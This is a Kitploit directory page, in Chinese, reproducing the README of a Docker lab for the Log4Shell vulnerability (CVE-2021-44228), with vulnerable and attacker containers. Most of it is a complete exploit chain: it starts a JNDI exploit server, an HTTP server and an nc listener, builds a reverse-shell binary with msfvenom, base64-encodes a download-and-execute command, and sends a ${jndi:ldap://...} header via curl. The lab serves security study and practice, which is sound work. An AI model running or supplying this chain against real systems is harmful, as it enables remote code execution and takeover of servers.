Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Log4Shell-CVE-2021-44228-ENV — Log4Shell Docker 环境 | Kitploit
工具/GitHubGitHub/ycdxsb/log4shell-cve-2021-44228-env
容器安全漏洞分析漏洞利用Web应用程序漏洞利用学习与教育实验室与实践
GitHubycdxsb/log4shell-cve-2021-44228-env

Log4Shell-CVE-2021-44228-ENV

Log4Shell Docker 环境

查看仓库
4144年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Log4Shell复现环境

示例说明

被攻击机ip:47.47.47.47

攻击机ip:48.48.48.48

被攻击机运行漏洞Docker

  • 使用DockerFile build docker镜像运行:
root@kitploit:~
docker build . -t vuln
docker run -p 8080:8080 --name vuln vuln

攻击机运行攻击Docker

  • 使用DockerFile build docker镜像运行
root@kitploit:~
docker build . -t attack
docker run -itd -p 9999:9999 -p 8888:8888 -p 1389:1389 -p 9000:9000 --name attack attack

攻击机环境准备

三个不同shell中执行命令,需要保证shell活跃

  • 攻击机启动JDNI服务器
root@kitploit:~
docker exec -it attack /bin/bash
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 48.48.48.48 -p 8888
  • 攻击机启动http服务器
root@kitploit:~
docker exec -it attack /bin/bash
python3 -m http.server 9999
  • 攻击机nc监听端口
root@kitploit:~
docker exec -it attack /bin/bash
nc -lvvp 9000

攻击机实现攻击

同一shell中执行命令

root@kitploit:~
docker exec -it attack /bin/bash
  • 攻击机准备反弹shell文件
root@kitploit:~
msfvenom -p linux/x64/shell_reverse_tcp LHOST=48.48.48.48 LPORT=9000 -f elf -o /rev.elf
  • 攻击机准备payload
root@kitploit:~
echo 'wget http://48.48.48.48:9999/rev.elf -O /tmp/rev.elf && chmod +x /tmp/rev.elf && /tmp/rev.elf' | base64
# d2dldCBodHRwOi8vNDguNDguNDguNDg6OTk5OS9yZXYuZWxmIC1PIC90bXAvcmV2LmVsZiAmJiBjaG1vZCAreCAvdG1wL3Jldi5lbGYgJiYgL3RtcC9yZXYuZWxmCg==
  • 发送攻击payload
root@kitploit:~
curl 47.47.47.47:8080 -H 'X-Api-Version: ${jndi:ldap://48.48.48.48:1389/Basic/Command/Base64/d2dldCBodHRwOi8vNDguNDguNDguNDg6OTk5OS9yZXYuZWxmIC1PIC90bXAvcmV2LmVsZiAmJiBjaG1vZCAreCAvdG1wL3Jldi5lbGYgJiYgL3RtcC9yZXYuZWxmCg==}'

命令生成

root@kitploit:~
python3 command_gen.py vuln_ip attack_ip

视频演示

Video

参考

  • https://github.com/christophetd/log4shell-vulnerable-app
  • https://github.com/twseptian/Spring-Boot-Log4j-CVE-2021-44228-Docker-Lab
下载工具